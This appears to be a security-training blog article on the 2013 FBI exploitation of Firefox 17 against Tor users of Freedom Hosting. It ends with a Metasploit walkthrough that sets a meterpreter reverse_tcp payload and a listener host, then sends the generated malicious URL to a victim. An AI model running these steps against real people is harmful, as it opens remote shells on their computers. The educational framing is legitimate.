The Tor network is an anonymizing network that allows people to browse the web and access other services without being traced. As part of this network, there is the so-called “darknet,” servers accessible only through Tor, which host a variety of services from forums to e-mail.

It does this by directing Internet traffic through a volunteer network of more than 3,000 relays to conceal the user’s location. While many of these services are innocent and aimed at those concerned about human rights abuses, the anonymity naturally attracts those with criminal intent such as the distribution of child pornography. It’s then impossible for law enforcement agencies to trace the original IP address.

The Story Behind FBI and the TOR Exploit

Eric Eoin Marques, a US-born 28-year-old living in Dublin, Ireland, is accused of being the chief architect behind Freedom Hosting, which is responsible for hosting child porn on 550 servers throughout Europe.

Freedom Hosting is a major hidden services hosting provider that can only be accessed through the Tor network.

Freedom Hosting and Marques have been associated with child pornography, so Tor released a statement claiming that they are in no way associated with the people running Freedom Hosting:

“The person, or persons, who run Freedom Hosting are in no way affiliated or connected to The Tor Project, Inc., the organization coordinating the development of the Tor software and research. In the past, adversarial organizations have skipped trying to break Tor hidden services and instead attacked the software running at the server behind the dot onion address. Exploits for PHP, Apache, MySQL, and other software are far more common than exploits for Tor. The current news indicates that someone has exploited the software behind Freedom Hosting. From what is known so far, the breach was used to configure the server in a way that it injects some sort of JavaScript exploit in the web pages delivered to users. This exploit is used to load a malware payload to infect user’s computers. The malware payload could be trying to exploit potential bugs in Firefox 17 ESR, on which our Tor browser is based. We’re investigating these bugs and will fix them if we can,” Tor said in a statement.

The FBI used a vulnerability in Firefox 17, on which the Tor browser is based, to turn Freedom Hosting sites into malware spreading tracker tools. It all works on the Firefox 17 JavaScript Zero Day Exploit; this malicious script is a tiny Windows executable hidden variable named “Magneto” which looks for victim’s MAC address and its hostname and sends it back as a HTTP web request to the Virginia server to expose the user’s real IP address. The FBI successfully gained access to the Freedom Hosting server and injected malicious HTML code, which checks whether the user’s browser is Firefox 17 or not.

Firefox onreadystatechange Event DocumentViewerImpl Use After Free

Mozilla Firefox before 22.0, Firefox ESR 17.x before 17.0.7, Thunderbird before 17.0.7, and Thunderbird ESR 17.x before 17.0.7 do not properly handle onreadystatechange events in conjunction with page reloading, which allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted web site that triggers an attempt to execute data at an unmapped memory location.

This module exploits a vulnerability found on Firefox 17.0.6, specifically a use after free of a DocumentViewerImpl object, triggered via an specially crafted web page using onreadystatechange events and the window.stop() API, as exploited in the wild on 2013 August to target Tor Browser users.

Tutorial

Launch terminal, run msfconsole, and type in use

windows/browser/mozilla_firefox_onreadystatechange:

Next type in show options to check all the available options for this exploit:

As we can see in the above figure, there are some options for this exploit. Now we can see here that the options that are required are showing “yes .” The first option is SRVHOST, which refers to the server host address; it means we have to set our local machine address here. The second option is SRVPORT; since the server port address is showing 8080, this means that port no.8080 must be enabled to successfully run this module.

Let us set the all required options type in set SRVHOST 192.168.0.3:

Now we are going to set a payload in this exploit. So type in set PAYLOAD windows/meterpreter/reverse_tcp:

Now again type in show options to check all the options for the exploit and whether the payload is set or not. Here we can see that our exploit’s options are set and our payload’s option needs to be set.

So type in set LHOST 192.168.0.103:

Now we are ready to run this module; type in run:

Want to learn more?? The InfoSec Institute CISSP Training course trains and prepares you to pass the premier security certification, the CISSP. Professionals that hold the CISSP have demonstrated that they have deep knowledge of all 10 Common Body of Knowledge Domains, and have the necessary skills to provide leadership in the creation and operational duties of enterprise wide information security programs.

InfoSec Institute's proprietary CISSP certification courseware materials are always up to date and synchronized with the latest ISC2 exam objectives. Our industry leading course curriculum combined with our award-winning CISSP training provided by expert instructors delivers the platform you need in order to pass the CISSP exam with flying colors. You will leave the InfoSec Institute CISSP Boot Camp with the knowledge and domain expertise to successfully pass the CISSP exam the first time you take it. Some benefits of the CISSP Boot Camp are:

  • Dual Certification - CISSP and ISSEP/ISSMP/ISSAP
  • We have cultivated a strong reputation for getting at the secrets of the CISSP certification exam
  • Our materials are always updated with the latest information on the exam objectives: This is NOT a Common Body of Knowledge review-it is intense, successful preparation for CISSP certification.
  • We focus on preparing you for the CISSP certification exam through drill sessions, review of the entire Common Body of Knowledge, and practical question and answer scenarios, all following a high-energy seminar approach.

Now we can see in the above figure that, after running the run command, a malicious URL http://192.168.0.103:8080/2Hek0bdO is generated in msfconsole. Now what we have to do just pass this URL to the victim.

If the victim is using the vulnerable version of Mozilla Firefox, we will get this type of screen and the victim is compromised:

References

http://rt.com/usa/fbi-exploiting-tor-child-porn-842/

http://siliconangle.com/blog/2013/08/06/darknet-freedom-hosting-sites-shutdown-led-by-fbi-exploit-use-against-tor-network/

http://thehackernews.com/2013/08/Firefox-Exploit-Tor-Network-child-pornography-Freedom-Hosting.html

http://www.rapid7.com/db/modules/exploit/windows/browser/mozilla_firefox_onreadystatechange